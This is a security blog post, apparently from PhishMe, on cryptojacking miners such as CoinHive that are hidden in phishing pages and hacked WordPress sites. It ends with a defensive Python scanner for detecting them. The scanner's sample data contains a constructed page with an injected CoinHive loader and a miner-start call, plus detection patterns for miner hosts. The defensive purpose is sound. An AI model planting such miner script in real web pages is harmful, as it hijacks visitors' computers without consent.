Bitcoin and most other cryptocurrencies are based on the idea that coins can be generated by having computers solve a difficult problem. The more CPU cycles an individual can dedicate to the mining problem, the greater the chance that they will create a new coin. For years, botnets have scanned corporate networks for high-powered machines and installed Bitcoin or other cryptocurrency mining software on the fastest computers. We’ve seen a wide variety of methods for infecting people with cryptocurrency miners. Since June 2017, for example, Monero miners have been launched as stand-alone malicious executables: a user unwittingly opens a malicious Word document attached to an email message, which causes the Monero-mining executable to be downloaded from the Internet and launched.
More recently, the news has been riddled with stories about a particular Monero mining software that runs in a browser. The site most commonly associated with this behavior is CoinHive. The level of exploitation is such that Check Point Software recently said that CoinHive miners were their “Most Wanted” malware, with 55% of their customers having been exposed to one or more cryptocurrency mining malware families.
We know from experience that many email recipients, even if they believe an email is likely to be a phish, will still click on it simply because they are curious. Many believe that if it is a phish, they will be smart enough to recognize it once they see the page and “not fall for it.”
The growing trend now is to embed the miner into more traditional credential-phishing sites, where an email lures users to a fake website designed to steal the user ID and password for an online service, email system, or financial institution. When this approach is used, popular browsers launch instances of themselves that are hidden from the user, allowing coin mining to continue in the background even after the user has closed every browser window he or she can see.
Figure 1 – An Alibaba Phish – PhishMe Threat ID: 26007111
When your employees click on ANY URL, especially if that website happens to be a vulnerable WordPress site, they may be exposed to a cryptocurrency miner. In the next example, we believe the DocuSign phisher, who has previously created at least forty other phishing sites, did not intend to cause visitors to mine cryptocurrency. Instead, the site he hacked via a WordPress vulnerability had also been hacked by someone else, who installed a CoinHive-based Monero miner.
Figure 2 – DocuSign Phish (email credential stealer) – PhishMe Threat ID: 25865106
Although the phisher did not include the CoinHive code, the WordPress site which was hacked by the phisher to host his DocuSign phish was ALSO hacked to install a CoinHive-based Monero miner in such a way that every visitor to the site began to mine Monero. Although Sucuri reported back in September that CoinHive miners had been seen on hacked websites, it was not until late December 2017 that we saw massive exploitation of WordPress sites to install CoinHive Miners, as documented by BleepingComputer. This attack was quite successful, earning the hackers at least $100,000 worth of Monero in just two of the Monero wallet addresses observed by security researchers. Other researchers have also reported wide delivery of this malware, including Malwarebytes, who says they block CoinHive related API calls as many as 8 million times per day!
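A defender's check for the WordPress scenario above, added here as an example and not code from the PhishMe post: sweep a fetched page's HTML for the CoinHive loader and its constructor call so an injected miner is spotted before users reach the page. It assumes the indicators the CoinHive library used as distributed (a loader served from coinhive.com and a `new CoinHive.Anonymous(...)` or `new CoinHive.User(...)` call); the sample pages are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# CoinHive indicators (assumed from the library as distributed: loader served from
# coinhive.com, pages calling CoinHive.Anonymous/User). Extend for other families.
MINER_SCRIPT_HOSTS = ("coinhive.com",)
MINER_INLINE_PATTERNS = (re.compile(r"new\s+CoinHive\.(Anonymous|User)\s*\("),)

class MinerScriptScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (finding, evidence) pairs
        self._script_buf = None  # text of the <script> being read, if any

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._script_buf = []
        src = dict(attrs).get("src") or ""
        host = urlparse(src).netloc.lower()  # also handles scheme-relative "//host/"
        if any(host == h or host.endswith("." + h) for h in MINER_SCRIPT_HOSTS):
            self.findings.append(("external miner script", src))

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or self._script_buf is None:
            return
        body, self._script_buf = "".join(self._script_buf), None
        for pat in MINER_INLINE_PATTERNS:
            match = pat.search(body)
            if match:
                self.findings.append(("inline miner call", match.group(0)))

def scan_html(html):
    """Return miner indicators found in one page's HTML (empty list if clean)."""
    scanner = MinerScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed samples: a phishing login page with an injected miner, and a clean page.
INJECTED_PAGE = """<html><head><title>Sign in</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER'); miner.start();
</script></head><body><form action="/login"></form></body></html>"""
CLEAN_PAGE = '<html><head><script src="/wp-includes/js/jquery.js"></script></head></html>'
```

Run `scan_html` over pages pulled from a URL sandbox or web proxy cache; a non-empty result on a site your users were lured to is worth a ticket even when the phishing kit itself is gone.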